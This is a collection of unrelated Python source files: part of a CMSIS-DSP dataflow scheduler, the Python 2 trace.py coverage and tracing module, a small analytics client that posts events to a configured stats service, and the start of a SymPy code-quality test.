intValues = [x * ppcm for x in result]
# Convert intValues to the smallest possible values
gcd = igcd(*intValues)
return([x / gcd for x in intValues])
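    # Illustrative example (assumed two-node graph): if node A produces 2
    # samples and node B consumes 3 on their single edge, the topology matrix
    # is [[2, -3]]; its nullspace is spanned by [3/2, 1], which the code above
    # scales to the integer repetition vector [3, 2].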
@property
def initEvolutionVector(self):
"""Initial FIFO state taking into account delays"""
return(np.array([self.getDelay(x) for x in self.edges]))
def evolutionVectorForNode(self,nodeID):
"""Return the evolution vector corresponding to a selected node"""
v = np.zeros(len(self._sortedNodes))
v[nodeID] = 1
return(v)
def computeSchedule(self,config=Configuration()):
# Init values
initB = self.initEvolutionVector
initN = self.nullVector()
        # Current values (copies)
b = np.array(initB)
n = np.array(initN)
if config.displayFIFOSizes:
for edge in self._sortedEdges:
print("%s:%s -> %s:%s" % (edge[0].owner.nodeID,edge[0].name,edge[1].owner.nodeID,edge[1].name))
print(b)
# Topology matrix
t = np.array(self.topologyMatrix())
# Define the list of FIFOs objects
nbFIFOS = t.shape[0]
allFIFOs = []
for i in range(nbFIFOS):
allFIFOs.append(FIFODesc(i))
# Normalization vector
normV = 1.0*np.apply_along_axis(abs,1,t).max(axis=1)
        # bMax below is used to track the maximum FIFO size
        # occurring during a run of the schedule
        #
        # The heuristic is:
        #
        # First we compute, for each edge, the maximum absolute value of
        # its row in the topology matrix. It is the minimum amount of data
        # the edge must be able to hold for the system to work, either
        # because it is produced by a node or consumed by another.
        # We use this value as a unit of measurement for the edge,
        # so we normalize the FIFO lengths by this size.
        # If this occupancy number is > 1 then enough data is available
        # on the FIFO for the consumer to consume it.
        # When we later select a node for scheduling we try to minimize
        # the occupancy number of all FIFOs by selecting the schedule
        # giving the minimum maximum occupancy number after the run.
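        # Illustrative example (assumed numbers): if the producer on an edge
        # writes 4 samples per execution and the consumer reads 2, normV for
        # that edge is 4; a FIFO currently holding 6 samples then has an
        # occupancy number of 6/4 = 1.5.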
bMax = 1.0*np.array(initB) / normV
schedule=[]
zeroVec = np.zeros(len(self._sortedNodes))
evolutionTime = 0
# While there are remaining nodes to schedule
while (n != zeroVec).any():
            # Look for the best node to schedule,
            # which is the one giving the minimum FIFO increase
# None selected
selected = -1
# Min FIFO size found
minVal = 10000000
nodeID = 0
for node in self._sortedNodes:
# If the node can be scheduled
if n[nodeID] > 0:
# Evolution vector if this node is selected
v = self.evolutionVectorForNode(nodeID)
# New fifos size after this evolution
newB = np.dot(t,v) + b
# Check that there is no FIFO underflow:
if np.all(newB >= 0):
# Total FIFO size for this possible execution
# We normalize to get the occupancy number as explained above
theMin = (1.0*np.array(newB) / normV).max()
# If this possible evolution is giving smaller FIFO size
# (measured in occupancy number) then it is selected
if theMin <= minVal:
minVal = theMin
selected = nodeID
nodeID = nodeID + 1
            # No node could be scheduled because there is not enough data
            # in the FIFOs. This should not occur if the null space has
            # dimension 1, so it is probably a bug if this exception is
            # raised
if selected < 0:
raise DeadlockError
# Now we have evaluated all schedulable nodes for this run
# and selected the one giving the smallest FIFO increase
# Real evolution vector for selected node
evol = self.evolutionVectorForNode(selected)
            # Keep track that this node has been scheduled
n = n - evol
# Compute new fifo state
fifoChange = np.dot(t,evol)
b = fifoChange + b
if config.displayFIFOSizes:
print(b)
bMax = np.maximum(b,bMax)
schedule.append(selected)
            # Analyze FIFOs to know if a FIFO write is
            # followed immediately by a FIFO read of the same size
analyzeStep(fifoChange,allFIFOs,evolutionTime)
evolutionTime = evolutionTime + 1
fifoMax=np.floor(bMax).astype(np.int32)
allBuffers=self.initializeFIFODescriptions(config,allFIFOs,fifoMax,evolutionTime)
self._allFIFOs = allFIFOs
self._allBuffers = allBuffers
return(Schedule(self,self._sortedNodes,self._sortedEdges,schedule))
class Schedule:
def __init__(self,g,sortedNodes,sortedEdges,schedule):
self._sortedNodes=sortedNodes
self._sortedEdges=sortedEdges
self._schedule = schedule
self._graph = g
        # Nodes containing pure functions (no state) like some
        # CMSIS-DSP functions.
        # When the scheduling is using the codeArray option, the
        # schedule is encoded as an array.
        # Function calls can no longer be inlined, so we need
        # to create new nodes for those function calls.
        # The _pureNodes structure is used for this.
        # It is a dict keyed by node type because we want to
        # reuse nodes of the same type.
self._pureNodes={}
nodeCodeID = 0
pureClassID = 1
for n in self.nodes:
n.codeID = nodeCodeID
nodeCodeID = nodeCodeID + 1
# Constant nodes are ignored since they have
# no arcs, and are connected to no FIFOs
theArgs=[]
theArgTypes=[]
i,o=n.allIOs()
for io in i:
# An io connected to a constant node has no fifo
if not io.fifo is None:
theArgs.append(self.fifoID(io.fifo))
theArgTypes.append(io.ctype)
else:
# Instead the arg is the name of a constant node
# instead of being a fifo ID
theArgs.append(io.constantNode.name)
theArgTypes.append(io.constantNode.name)
for io in o:
theArgs.append(self.fifoID(io.fifo))
theArgTypes.append(io.ctype)
n.args=theArgs
# Analyze the nature of arguments for pure functions
# The information created during this analysis
# is useful when generating a class containing the
# pure function
if not n.hasState:
theType=(n.nodeName,tuple(theArgTypes))
if not theType in self._pureNodes:
self._pureNodes[theType]=n
n.pureClassID = pureClassID
pureClassID = pureClassID + 1
else:
n.pureClassID = self._pureNodes[theType].pureClassID
n.pureNodeType=theType
n.analyzeArgs()
def hasDelay(self,edge):
return(self._graph.hasDelay(edge))
def getDelay(self,edge):
return(self._graph.getDelay(edge))
@property
def pureNodes(self):
return self._pureNodes
@property
def constantEdges(self):
return self._graph.constantEdges
@property
def nodes(self):
return self._sortedNodes
@property
def edges(self):
return self._sortedEdges
@property
def schedule(self):
return self._schedule
#@property
#def fifoLengths(self):
# return self._fifos
@property
def scheduleLength(self):
return len(self.schedule)
@property
def memory(self):
#theBytes=[x[0].theType.bytes for x in self.edges]
#theSizes=[x[0]*x[1] for x in zip(self.fifoLengths,theBytes)]
#return(np.sum(theSizes))
return(self._graph._totalMemory)
@property
def graph(self):
return self._graph
def fifoID(self,edge):
return(self.edges.index(edge))
def outputFIFOs(self,node):
outs=[]
for io in node.outputNames:
x = node._outputs[io]
fifo=(self.fifoID(x.fifo),io)
outs.append(fifo)
return(outs)
def ccode(self,directory,config=Configuration()):
"""Write graphviz into file f"""
cmsisdsp.sdf.scheduler.ccode.gencode(self,directory,config)
def pythoncode(self,directory,config=Configuration()):
"""Write graphviz into file f"""
cmsisdsp.sdf.scheduler.pythoncode.gencode(self,directory,config)
def graphviz(self,f,config=Configuration()):
"""Write graphviz into file f"""
cmsisdsp.sdf.scheduler.graphviz.gengraph(self,f,config)
|
|
#!/usr/bin/env python
# portions copyright 2001, Autonomous Zones Industries, Inc., all rights...
# err... reserved and offered to the public under the terms of the
# Python 2.2 license.
# Author: Zooko O'Whielacronx
# http://zooko.com/
# mailto:zooko@zooko.com
#
# Copyright 2000, Mojam Media, Inc., all rights reserved.
# Author: Skip Montanaro
#
# Copyright 1999, Bioreason, Inc., all rights reserved.
# Author: Andrew Dalke
#
# Copyright 1995-1997, Automatrix, Inc., all rights reserved.
# Author: Skip Montanaro
#
# Copyright 1991-1995, Stichting Mathematisch Centrum, all rights reserved.
#
#
# Permission to use, copy, modify, and distribute this Python software and
# its associated documentation for any purpose without fee is hereby
# granted, provided that the above copyright notice appears in all copies,
# and that both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of neither Automatrix,
# Bioreason or Mojam Media be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior permission.
#
"""program/module to trace Python program or function execution
Sample use, command line:
trace.py -c -f counts --ignore-dir '$prefix' spam.py eggs
trace.py -t --ignore-dir '$prefix' spam.py eggs
trace.py --trackcalls spam.py eggs
Sample use, programmatically
import sys
# create a Trace object, telling it what to ignore, and whether to
# do tracing or line-counting or both.
tracer = trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix,], trace=0,
count=1)
# run the new command using the given tracer
tracer.run('main()')
# make a report, placing output in /tmp
r = tracer.results()
r.write_results(show_missing=True, coverdir="/tmp")
"""
import linecache
import os
import re
import sys
import time
import token
import tokenize
import inspect
import gc
import dis
try:
import cPickle
pickle = cPickle
except ImportError:
import pickle
try:
import threading
except ImportError:
_settrace = sys.settrace
def _unsettrace():
sys.settrace(None)
else:
def _settrace(func):
threading.settrace(func)
sys.settrace(func)
def _unsettrace():
sys.settrace(None)
threading.settrace(None)
def usage(outfile):
outfile.write("""Usage: %s [OPTIONS] <file> [ARGS]
Meta-options:
--help Display this help then exit.
--version Output version information then exit.
Otherwise, exactly one of the following three options must be given:
-t, --trace Print each line to sys.stdout before it is executed.
-c, --count Count the number of times each line is executed
and write the counts to <module>.cover for each
module executed, in the module's directory.
See also `--coverdir', `--file', `--no-report' below.
-l, --listfuncs Keep track of which functions are executed at least
once and write the results to sys.stdout after the
program exits.
-T, --trackcalls Keep track of caller/called pairs and write the
results to sys.stdout after the program exits.
-r, --report Generate a report from a counts file; do not execute
any code. `--file' must specify the results file to
read, which must have been created in a previous run
with `--count --file=FILE'.
Modifiers:
-f, --file=<file> File to accumulate counts over several runs.
-R, --no-report Do not generate the coverage report files.
Useful if you want to accumulate over several runs.
-C, --coverdir=<dir> Directory where the report files go. The coverage
report for <package>.<module> is written to file
<dir>/<package>/<module>.cover.
-m, --missing Annotate executable lines that were not executed
with '>>>>>> '.
-s, --summary Write a brief summary on stdout for each file.
(Can only be used with --count or --report.)
-g, --timing Prefix each line with the time since the program started.
Only used while tracing.
Filters, may be repeated multiple times:
--ignore-module=<mod> Ignore the given module(s) and its submodules
(if it is a package). Accepts comma separated
list of module names
--ignore-dir=<dir> Ignore files in the given directory (multiple
directories can be joined by os.pathsep).
""" % sys.argv[0])
PRAGMA_NOCOVER = "#pragma NO COVER"
# Simple rx to find lines with no code.
rx_blank = re.compile(r'^\s*(#.*)?$')
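# For example, rx_blank matches "", "    ", and "    # just a comment".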
class Ignore:
def __init__(self, modules = None, dirs = None):
self._mods = modules or []
self._dirs = dirs or []
self._dirs = map(os.path.normpath, self._dirs)
self._ignore = { '<string>': 1 }
def names(self, filename, modulename):
if modulename in self._ignore:
return self._ignore[modulename]
# haven't seen this one before, so see if the module name is
# on the ignore list. Need to take some care since ignoring
# "cmp" musn't mean ignoring "cmpcache" but ignoring
# "Spam" must also mean ignoring "Spam.Eggs".
for mod in self._mods:
if mod == modulename: # Identical names, so ignore
self._ignore[modulename] = 1
return 1
# check if the module is a proper submodule of something on
# the ignore list
n = len(mod)
# (will not overflow since if the first n characters are the
# same and the name has not already occurred, then the size
# of "name" is greater than that of "mod")
if mod == modulename[:n] and modulename[n] == '.':
self._ignore[modulename] = 1
return 1
# Now check that __file__ isn't in one of the directories
if filename is None:
# must be a built-in, so we must ignore
self._ignore[modulename] = 1
return 1
# Ignore a file when it contains one of the ignorable paths
for d in self._dirs:
# The '+ os.sep' is to ensure that d is a parent directory,
# as compared to cases like:
# d = "/usr/local"
# filename = "/usr/local.py"
# or
# d = "/usr/local.py"
# filename = "/usr/local.py"
if filename.startswith(d + os.sep):
self._ignore[modulename] = 1
return 1
# Tried the different ways, so we don't ignore this module
self._ignore[modulename] = 0
return 0
def modname(path):
"""Return a plausible module name for the patch."""
base = os.path.basename(path)
filename, ext = os.path.splitext(base)
return filename
def fullmodname(path):
"""Return a plausible module name for the path."""
# If the file 'path' is part of a package, then the filename isn't
# enough to uniquely identify it. Try to do the right thing by
# looking in sys.path for the longest matching prefix. We'll
# assume that the rest is the package name.
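    # For example (illustrative; the result depends on sys.path):
    #   fullmodname("/usr/lib/python2.7/email/mime/text.py")
    #   -> "email.mime.text"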
comparepath = os.path.normcase(path)
longest = ""
for dir in sys.path:
dir = os.path.normcase(dir)
if comparepath.startswith(dir) and comparepath[len(dir)] == os.sep:
if len(dir) > len(longest):
longest = dir
if longest:
base = path[len(longest) + 1:]
else:
base = path
# the drive letter is never part of the module name
drive, base = os.path.splitdrive(base)
base = base.replace(os.sep, ".")
if os.altsep:
base = base.replace(os.altsep, ".")
filename, ext = os.path.splitext(base)
return filename.lstrip(".")
class CoverageResults:
def __init__(self, counts=None, calledfuncs=None, infile=None,
callers=None, outfile=None):
self.counts = counts
if self.counts is None:
self.counts = {}
self.counter = self.counts.copy() # map (filename, lineno) to count
self.calledfuncs = calledfuncs
if self.calledfuncs is None:
self.calledfuncs = {}
self.calledfuncs = self.calledfuncs.copy()
self.callers = callers
if self.callers is None:
self.callers = {}
self.callers = self.callers.copy()
self.infile = infile
self.outfile = outfile
if self.infile:
# Try to merge existing counts file.
try:
counts, calledfuncs, callers = \
pickle.load(open(self.infile, 'rb'))
self.update(self.__class__(counts, calledfuncs, callers))
except (IOError, EOFError, ValueError), err:
print >> sys.stderr, ("Skipping counts file %r: %s"
% (self.infile, err))
def update(self, other):
"""Merge in the data from another CoverageResults"""
counts = self.counts
calledfuncs = self.calledfuncs
callers = self.callers
other_counts = other.counts
other_calledfuncs = other.calledfuncs
other_callers = other.callers
for key in other_counts.keys():
counts[key] = counts.get(key, 0) + other_counts[key]
for key in other_calledfuncs.keys():
calledfuncs[key] = 1
for key in other_callers.keys():
callers[key] = 1
def write_results(self, show_missing=True, summary=False, coverdir=None):
"""
@param coverdir
"""
if self.calledfuncs:
print
print "functions called:"
calls = self.calledfuncs.keys()
calls.sort()
for filename, modulename, funcname in calls:
print ("filename: %s, modulename: %s, funcname: %s"
% (filename, modulename, funcname))
if self.callers:
print
print "calling relationships:"
calls = self.callers.keys()
calls.sort()
lastfile = lastcfile = ""
for ((pfile, pmod, pfunc), (cfile, cmod, cfunc)) in calls:
if pfile != lastfile:
print
print "***", pfile, "***"
lastfile = pfile
lastcfile = ""
if cfile != pfile and lastcfile != cfile:
print " -->", cfile
lastcfile = cfile
print " %s.%s -> %s.%s" % (pmod, pfunc, cmod, cfunc)
# turn the counts data ("(filename, lineno) = count") into something
# accessible on a per-file basis
per_file = {}
for filename, lineno in self.counts.keys():
lines_hit = per_file[filename] = per_file.get(filename, {})
lines_hit[lineno] = self.counts[(filename, lineno)]
# accumulate summary info, if needed
sums = {}
for filename, count in per_file.iteritems():
# skip some "files" we don't care about...
if filename == "<string>":
continue
if filename.startswith("<doctest "):
continue
if filename.endswith((".pyc", ".pyo")):
filename = filename[:-1]
if coverdir is None:
dir = os.path.dirname(os.path.abspath(filename))
modulename = modname(filename)
else:
dir = coverdir
if not os.path.exists(dir):
os.makedirs(dir)
modulename = fullmodname(filename)
# If desired, get a list of the line numbers which represent
# executable content (returned as a dict for better lookup speed)
if show_missing:
lnotab = find_executable_linenos(filename)
else:
lnotab = {}
source = linecache.getlines(filename)
coverpath = os.path.join(dir, modulename + ".cover")
n_hits, n_lines = self.write_results_file(coverpath, source,
lnotab, count)
if summary and n_lines:
percent = 100 * n_hits // n_lines
sums[modulename] = n_lines, percent, modulename, filename
if summary and sums:
mods = sums.keys()
mods.sort()
print "lines cov% module (path)"
for m in mods:
n_lines, percent, modulename, filename = sums[m]
print "%5d %3d%% %s (%s)" % sums[m]
if self.outfile:
# try and store counts and module info into self.outfile
try:
pickle.dump((self.counts, self.calledfuncs, self.callers),
open(self.outfile, 'wb'), 1)
except IOError, err:
print >> sys.stderr, "Can't save counts files because %s" % err
def write_results_file(self, path, lines, lnotab, lines_hit):
"""Return a coverage results file in path."""
try:
outfile = open(path, "w")
except IOError, err:
print >> sys.stderr, ("trace: Could not open %r for writing: %s"
"- skipping" % (path, err))
return 0, 0
n_lines = 0
n_hits = 0
for i, line in enumerate(lines):
lineno = i + 1
# do the blank/comment match to try to mark more lines
# (help the reader find stuff that hasn't been covered)
if lineno in lines_hit:
outfile.write("%5d: " % lines_hit[lineno])
n_hits += 1
n_lines += 1
elif rx_blank.match(line):
outfile.write(" ")
else:
# lines preceded by no marks weren't hit
# Highlight them if so indicated, unless the line contains
# #pragma: NO COVER
if lineno in lnotab and not PRAGMA_NOCOVER in lines[i]:
outfile.write(">>>>>> ")
n_lines += 1
else:
outfile.write(" ")
outfile.write(lines[i].expandtabs(8))
outfile.close()
return n_hits, n_lines
def find_lines_from_code(code, strs):
"""Return dict where keys are lines in the line number table."""
linenos = {}
for _, lineno in dis.findlinestarts(code):
if lineno not in strs:
linenos[lineno] = 1
return linenos
def find_lines(code, strs):
"""Return lineno dict for all code objects reachable from code."""
# get all of the lineno information from the code of this scope level
linenos = find_lines_from_code(code, strs)
# and check the constants for references to other code objects
for c in code.co_consts:
if inspect.iscode(c):
# find another code object, so recurse into it
linenos.update(find_lines(c, strs))
return linenos
def find_strings(filename):
"""Return a dict of possible docstring positions.
    The dict maps line numbers to strings. There is an entry for
    each line that contains only a string or a part of a triple-quoted
    string.
"""
d = {}
# If the first token is a string, then it's the module docstring.
# Add this special case so that the test in the loop passes.
prev_ttype = token.INDENT
f = open(filename)
for ttype, tstr, start, end, line in tokenize.generate_tokens(f.readline):
if ttype == token.STRING:
if prev_ttype == token.INDENT:
sline, scol = start
eline, ecol = end
for i in range(sline, eline + 1):
d[i] = 1
prev_ttype = ttype
f.close()
return d
def find_executable_linenos(filename):
"""Return dict where keys are line numbers in the line number table."""
try:
prog = open(filename, "rU").read()
except IOError, err:
print >> sys.stderr, ("Not printing coverage data for %r: %s"
% (filename, err))
return {}
code = compile(prog, filename, "exec")
strs = find_strings(filename)
return find_lines(code, strs)
class Trace:
def __init__(self, count=1, trace=1, countfuncs=0, countcallers=0,
ignoremods=(), ignoredirs=(), infile=None, outfile=None,
timing=False):
"""
@param count true iff it should count number of times each
line is executed
@param trace true iff it should print out each line that is
being counted
@param countfuncs true iff it should just output a list of
(filename, modulename, funcname,) for functions
that were called at least once; This overrides
`count' and `trace'
@param ignoremods a list of the names of modules to ignore
@param ignoredirs a list of the names of directories to ignore
all of the (recursive) contents of
@param infile file from which to read stored counts to be
added into the results
@param outfile file in which to write the results
        @param timing true iff timing information should be displayed
"""
self.infile = infile
self.outfile = outfile
self.ignore = Ignore(ignoremods, ignoredirs)
self.counts = {} # keys are (filename, linenumber)
self.blabbed = {} # for debugging
self.pathtobasename = {} # for memoizing os.path.basename
self.donothing = 0
self.trace = trace
self._calledfuncs = {}
self._callers = {}
self._caller_cache = {}
self.start_time = None
if timing:
self.start_time = time.time()
if countcallers:
self.globaltrace = self.globaltrace_trackcallers
elif countfuncs:
self.globaltrace = self.globaltrace_countfuncs
elif trace and count:
self.globaltrace = self.globaltrace_lt
self.localtrace = self.localtrace_trace_and_count
elif trace:
self.globaltrace = self.globaltrace_lt
self.localtrace = self.localtrace_trace
elif count:
self.globaltrace = self.globaltrace_lt
self.localtrace = self.localtrace_count
else:
# Ahem -- do nothing? Okay.
self.donothing = 1
def run(self, cmd):
import __main__
dict = __main__.__dict__
self.runctx(cmd, dict, dict)
def runctx(self, cmd, globals=None, locals=None):
if globals is None: globals = {}
if locals is None: locals = {}
if not self.donothing:
_settrace(self.globaltrace)
try:
exec cmd in globals, locals
finally:
if not self.donothing:
_unsettrace()
def runfunc(self, func, *args, **kw):
result = None
if not self.donothing:
sys.settrace(self.globaltrace)
try:
result = func(*args, **kw)
finally:
if not self.donothing:
sys.settrace(None)
return result
def file_module_function_of(self, frame):
code = frame.f_code
filename = code.co_filename
if filename:
modulename = modname(filename)
else:
modulename = None
funcname = code.co_name
clsname = None
if code in self._caller_cache:
if self._caller_cache[code] is not None:
clsname = self._caller_cache[code]
else:
self._caller_cache[code] = None
## use of gc.get_referrers() was suggested by Michael Hudson
# all functions which refer to this code object
funcs = [f for f in gc.get_referrers(code)
if inspect.isfunction(f)]
# require len(func) == 1 to avoid ambiguity caused by calls to
# new.function(): "In the face of ambiguity, refuse the
# temptation to guess."
if len(funcs) == 1:
dicts = [d for d in gc.get_referrers(funcs[0])
if isinstance(d, dict)]
if len(dicts) == 0:
# PyPy may store functions directly on the class
# (more exactly: the container is not a Python object)
dicts = funcs
if len(dicts) == 1:
classes = [c for c in gc.get_referrers(dicts[0])
if hasattr(c, "__bases__")]
if len(classes) == 1:
# ditto for new.classobj()
clsname = classes[0].__name__
# cache the result - assumption is that new.* is
# not called later to disturb this relationship
# _caller_cache could be flushed if functions in
# the new module get called.
self._caller_cache[code] = clsname
if clsname is not None:
funcname = "%s.%s" % (clsname, funcname)
return filename, modulename, funcname
def globaltrace_trackcallers(self, frame, why, arg):
"""Handler for call events.
Adds information about who called who to the self._callers dict.
"""
if why == 'call':
# XXX Should do a better job of identifying methods
this_func = self.file_module_function_of(frame)
parent_func = self.file_module_function_of(frame.f_back)
self._callers[(parent_func, this_func)] = 1
def globaltrace_countfuncs(self, frame, why, arg):
"""Handler for call events.
Adds (filename, modulename, funcname) to the self._calledfuncs dict.
"""
if why == 'call':
this_func = self.file_module_function_of(frame)
self._calledfuncs[this_func] = 1
def globaltrace_lt(self, frame, why, arg):
"""Handler for call events.
If the code block being entered is to be ignored, returns `None',
else returns self.localtrace.
"""
if why == 'call':
code = frame.f_code
filename = frame.f_globals.get('__file__', None)
if filename:
# XXX modname() doesn't work right for packages, so
# the ignore support won't work right for packages
modulename = modname(filename)
if modulename is not None:
ignore_it = self.ignore.names(filename, modulename)
if not ignore_it:
if self.trace:
print (" --- modulename: %s, funcname: %s"
% (modulename, code.co_name))
return self.localtrace
else:
return None
def localtrace_trace_and_count(self, frame, why, arg):
if why == "line":
# record the file name and line number of every trace
filename = frame.f_code.co_filename
lineno = frame.f_lineno
key = filename, lineno
self.counts[key] = self.counts.get(key, 0) + 1
if self.start_time:
print '%.2f' % (time.time() - self.start_time),
bname = os.path.basename(filename)
print "%s(%d): %s" % (bname, lineno,
linecache.getline(filename, lineno)),
return self.localtrace
def localtrace_trace(self, frame, why, arg):
if why == "line":
# record the file name and line number of every trace
filename = frame.f_code.co_filename
lineno = frame.f_lineno
if self.start_time:
print '%.2f' % (time.time() - self.start_time),
bname = os.path.basename(filename)
print "%s(%d): %s" % (bname, lineno,
linecache.getline(filename, lineno)),
return self.localtrace
def localtrace_count(self, frame, why, arg):
if why == "line":
filename = frame.f_code.co_filename
lineno = frame.f_lineno
key = filename, lineno
self.counts[key] = self.counts.get(key, 0) + 1
return self.localtrace
def results(self):
return CoverageResults(self.counts, infile=self.infile,
outfile=self.outfile,
calledfuncs=self._calledfuncs,
callers=self._callers)
def _err_exit(msg):
sys.stderr.write("%s: %s\n" % (sys.argv[0], msg))
sys.exit(1)
def main(argv=None):
import getopt
if argv is None:
argv = sys.argv
try:
opts, prog_argv = getopt.getopt(argv[1:], "tcrRf:d:msC:lTg",
["help", "version", "trace", "count",
"report", "no-report", "summary",
"file=", "missing",
"ignore-module=", "ignore-dir=",
"coverdir=", "listfuncs",
"trackcalls", "timing"])
except getopt.error, msg:
sys.stderr.write("%s: %s\n" % (sys.argv[0], msg))
sys.stderr.write("Try `%s --help' for more information\n"
% sys.argv[0])
sys.exit(1)
trace = 0
count = 0
report = 0
no_report = 0
counts_file = None
missing = 0
ignore_modules = []
ignore_dirs = []
coverdir = None
summary = 0
listfuncs = False
countcallers = False
timing = False
for opt, val in opts:
if opt == "--help":
usage(sys.stdout)
sys.exit(0)
if opt == "--version":
sys.stdout.write("trace 2.0\n")
sys.exit(0)
if opt == "-T" or opt == "--trackcalls":
countcallers = True
continue
if opt == "-l" or opt == "--listfuncs":
listfuncs = True
continue
if opt == "-g" or opt == "--timing":
timing = True
continue
if opt == "-t" or opt == "--trace":
trace = 1
continue
if opt == "-c" or opt == "--count":
count = 1
continue
if opt == "-r" or opt == "--report":
report = 1
continue
if opt == "-R" or opt == "--no-report":
no_report = 1
continue
if opt == "-f" or opt == "--file":
counts_file = val
continue
if opt == "-m" or opt == "--missing":
missing = 1
continue
if opt == "-C" or opt == "--coverdir":
coverdir = val
continue
if opt == "-s" or opt == "--summary":
summary = 1
continue
if opt == "--ignore-module":
for mod in val.split(","):
ignore_modules.append(mod.strip())
continue
if opt == "--ignore-dir":
for s in val.split(os.pathsep):
s = os.path.expandvars(s)
# should I also call expanduser? (after all, could use $HOME)
s = s.replace("$prefix",
os.path.join(sys.prefix, "lib",
"python" + sys.version[:3]))
s = s.replace("$exec_prefix",
os.path.join(sys.exec_prefix, "lib",
"python" + sys.version[:3]))
s = os.path.normpath(s)
ignore_dirs.append(s)
continue
assert 0, "Should never get here"
if listfuncs and (count or trace):
_err_exit("cannot specify both --listfuncs and (--trace or --count)")
if not (count or trace or report or listfuncs or countcallers):
_err_exit("must specify one of --trace, --count, --report, "
"--listfuncs, or --trackcalls")
if report and no_report:
_err_exit("cannot specify both --report and --no-report")
if report and not counts_file:
_err_exit("--report requires a --file")
if no_report and len(prog_argv) == 0:
_err_exit("missing name of file to run")
# everything is ready
if report:
results = CoverageResults(infile=counts_file, outfile=counts_file)
results.write_results(missing, summary=summary, coverdir=coverdir)
else:
sys.argv = prog_argv
progname = prog_argv[0]
sys.path[0] = os.path.split(progname)[0]
t = Trace(count, trace, countfuncs=listfuncs,
countcallers=countcallers, ignoremods=ignore_modules,
ignoredirs=ignore_dirs, infile=counts_file,
outfile=counts_file, timing=timing)
try:
with open(progname) as fp:
code = compile(fp.read(), progname, 'exec')
# try to emulate __main__ namespace as much as possible
globs = {
'__file__': progname,
'__name__': '__main__',
'__package__': None,
'__cached__': None,
}
t.runctx(code, globs, globs)
except IOError, err:
_err_exit("Cannot run file %r because: %s" % (sys.argv[0], err))
except SystemExit:
pass
results = t.results()
if not no_report:
results.write_results(missing, summary=summary, coverdir=coverdir)
if __name__=='__main__':
main()
|
|
# -*- coding: utf-8 -*-
"""
"""
import json
import socket
import logging
import threading
from urlparse import urljoin
import requests
from apiaccesstoken.clientside import RequestsAccessTokenAuth
def get_log(e=None):
return logging.getLogger("{0}.{1}".format(__name__, e) if e else __name__)
# Set up by a call to Analytics.init(...):
__Analytics = None
class Analytics(object):
"""A light namespace for the REST API to stats-service.
"""
JSON_CT = {
# I accept JSON:
'Accept': 'application/json',
# I POST JSON:
'Content-Type': 'application/json',
}
ANALYTICS = '/log/event/'
EVENT = '/log/event/{}/'
def __init__(self, config={}):
"""Set up the analytics REST API service details.
:param config: a dict
E.g.::
config = {
# Don't log events, noop them instead.
"disabled": True,
"access_token": "<access token string>",
# The analytics service to connect to:
"url": "http://localhost:20080",
                # Log asynchronously and don't wait for a response.
"defer": True,
                # Optional dict whose entries become "tags" in logged events.
                # If not set, the "tags" field won't be present in logged
                # events.
                "tags": <a dict of key-value pairs to include in an event log>,
}
tags example::
{"mode": "prodution" | "development"}
        If defer is True, log() returns immediately and a background thread
        handles the POST. Any raise_for_status() error will be logged and not
        raised.
"""
log = get_log("Analytics.init")
self.disabled = config.get("disabled", False)
self.base_uri = config.get("url", "http://localhost:20080")
self.tags = config.get("tags", {})
log.debug(
"Logging events to stats-service '{}'.".format(self.base_uri)
)
self.defer = config.get("defer", True)
self.app_node = socket.gethostname()
        # one-shot flag: warn only once that analytics is disabled when
        # self.log() is called
self._log_is_disabled = False
access_token = config.get("access_token")
if not access_token and not self.disabled:
raise ValueError("access_token us not set!")
else:
log.debug("access token set.")
self.auth = RequestsAccessTokenAuth(access_token)
@classmethod
def init(cls, config={}):
"""Set up the Analytics instance for stats() to return.
        :param config: a dict of analytics settings (see __init__ above).

        If no 'url' field is set, or it is empty, analytics logging will be
        disabled after logging a single warning. This allows analytics to be
        turned off without causing errors.
"""
global __Analytics
__Analytics = Analytics(
dict(
# Disable event logging if the uri is empty:
disabled=config.get("disabled"),
access_token=config.get("access_token"),
url=config.get("url"),
defer=config.get("defer", True),
)
)
return __Analytics
@classmethod
def stats(cls):
"""Return the configured Analytics instance set up by init()."""
assert __Analytics is not None
return __Analytics
def get_auth(self):
"""Recover the configured access auth instance."""
if not self.auth:
raise ValueError(
"No access token set! Please call set_auth() or login()."
)
return self.auth
def ping(self):
"""Recover the API Service status page.
This will raise a connection error or it will return successfully.
:returns: service status dict.
"""
log = get_log('ping')
uri = urljoin(self.base_uri, 'ping/')
log.debug("contacting '{}'".format(uri))
resp = requests.get(uri, headers=self.JSON_CT)
resp.raise_for_status()
return resp.json()
def system_startup(self):
"""Log the start of a service on a machine.
"""
tags = dict(
uid="system-{}".format(self.app_node),
ip=socket.gethostbyname(self.app_node),
hostname=self.app_node,
)
# add in extra tags if they have been specified
for key in self.tags:
tags[key] = unicode(self.tags[key])
points = [dict(
measurement='server_startup',
tags=tags,
fields=dict(
# will allow you to count() the number of startups.
# lots/<time period e.g. min,day,etc> is probably bad :)
value=1
)
)]
self.log(points)
def log(self, points):
"""Log an analytics event string with the given data.
:param points: InfluxDB points.
"""
log = get_log("Analytics.log")
if self.disabled is True:
if self._log_is_disabled is False:
log.warn("Analytics is disabled in configuration!")
                self._log_is_disabled = True
return
uri = urljoin(self.base_uri, self.ANALYTICS)
points = json.dumps(points)
def _go(defer, uri, data):
#log.debug("sending data '{}' to '{}'".format(data, uri))
returned = ""
try:
resp = requests.post(
uri,
data=data,
headers=self.JSON_CT,
auth=self.get_auth()
)
except requests.exceptions.ConnectionError, e:
log.warn("Uable to connect to log event: {}".format(e))
else:
if resp.status_code > 399:
log.error("Log event error: {} {}".format(
resp.status_code, resp
))
else:
returned = resp.json()
return returned
if self.defer:
t = threading.Thread(target=_go, args=(self.defer, uri, points))
t.daemon = True
t.start()
else:
return _go(self.defer, uri, points)
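# Typical usage (illustrative sketch; the endpoint and token values are
# placeholders, not real configuration):
#
#   Analytics.init({
#       "url": "http://localhost:20080",
#       "access_token": "<access token string>",
#       "defer": True,
#   })
#   Analytics.stats().system_startup()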
|
|
from os import walk, sep, pardir
from os.path import split, join, abspath, exists, isfile
from glob import glob
import re
import random
import ast
from sympy.core.compatibility import PY3
# System path separator (usually slash or backslash) to be
# used with excluded files, e.g.
# exclude = set([
# "%(sep)smpmath%(sep)s" % sepd,
# ])
sepd = {"sep": sep}
# path and sympy_path
SYMPY_PATH = abspath(join(split(__file__)[0], pardir, pardir)) # go to sympy/
assert exists(SYMPY_PATH)
